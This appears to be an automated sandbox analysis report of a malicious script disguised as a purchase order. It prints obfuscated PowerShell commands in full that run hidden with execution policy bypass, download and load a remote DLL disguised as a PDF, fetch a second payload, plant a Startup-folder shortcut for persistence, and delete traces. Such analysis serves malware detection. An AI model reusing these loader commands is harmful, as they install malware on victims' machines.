Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Done.vbs"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\WWAHost.exe C:\Windows\SysWOW64\WWAHost.exe
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\explorer.exe explorer.exe
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\explorer.exe "C:\Windows\explorer.exe" /LOADSAVEDWINDOWS
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{06290BD0-48AA-11D2-8432-006008C3FBFC}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220527
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2fuzbet0.1gd.ps1
Source: classification engine Classification label: mal100.troj.evad.winWSF@70/24@8/6
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5980:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4992:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3332:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3276:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\explorer.exe
Source: unknown Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\SysWOW64\WWAHost.exe Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: RegAsm.pdb source: explorer.exe, 00000006.00000000.614677532.00000000029E7000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 0000000F.00000003.425165861.0000000002754000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: WAUgLeAhDG.pdb source: powershell.exe, 0000000C.00000002.436703755.00000181B4EB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.451254825.00000181CD3D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000F.00000003.425165861.0000000002754000.00000004.00000800.00020000.00000000.sdmp, WWAHost.exe
Source: Binary string: RegAsm.pdb4 source: explorer.exe, 00000006.00000000.614677532.00000000029E7000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: WAUgLeAhDG.pdbH|^| P|_CorDllMainmscoree.dll source: powershell.exe, 0000000C.00000002.436703755.00000181B4EB9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.451254825.00000181CD3D0000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: ddscfIvqgW.pdb source: powershell.exe, 0000000C.00000002.436356861.00000181B4DB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.441209131.00000181B57D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.451218272.00000181CCFB0000.00000004.08000000.00040000.00000000.sdmp

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden wget 'http://2.56.57.22/daveCrpted.jpg' -o C:\Windows\Temp\Done.vbs;explorer.exe C:\Windows\Temp\Done.vbs;Start-Sleep 1;rm *.vbs,*.wsf
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwAyADYALQAwAD???ALQAyADAAMgAyAC0A???wB0AGEAcgB0AF???AcAAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AawBqAGkAaAB1AGcAZgBkAHMAdAAvADIAMgAuADcANQAuADYANQAuADIALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/26-05-2022-StartUp.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.kjihugfdst/22.75.65.2//:ptth'))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe" -WindowStyle Hidden Copy-Item -Path *.vbs -Destination C:\ProgramData\Done.vbs
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden Start-Sleep 5;Start-Process C:\ProgramData\Done.vbs
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden Start-Sleep 5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFEBFBC0E17 push eax; iretd 12_2_00007FFEBFBC0E29
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFEBFC917EE push ss; ret 12_2_00007FFEBFC917EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041D336 push esp; ret 15_2_0041D338
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004184C6 push edi; retf 15_2_004184C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_004164EE pushfd ; iretd 15_2_004164EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041BDF2 push eax; ret 15_2_0041BDF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041BDFB push eax; ret 15_2_0041BE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041BDA5 push eax; ret 15_2_0041BDF8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0041BE5C push eax; ret 15_2_0041BE62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 15_2_0296D0D1 push ecx; ret 15_2_0296D0E4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFEBFBB000A pushfd ; ret 23_2_00007FFEBFBB002A
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_040AD0D1 push ecx; ret 27_2_040AD0E4
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0322D336 push esp; ret 27_2_0322D338
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0322BE5C push eax; ret 27_2_0322BE62
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0322BDA5 push eax; ret 27_2_0322BDF8
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0322BDF2 push eax; ret 27_2_0322BDF8
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_0322BDFB push eax; ret 27_2_0322BE62
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_032264EE pushfd ; iretd 27_2_032264EF
Source: C:\Windows\SysWOW64\WWAHost.exe Code function: 27_2_032284C6 push edi; retf 27_2_032284C8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\notepad.lnk

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File deleted: c:\users\user\desktop\nueva orden de compra 80107.wsf
Source: C:\Windows\System32\wscript.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
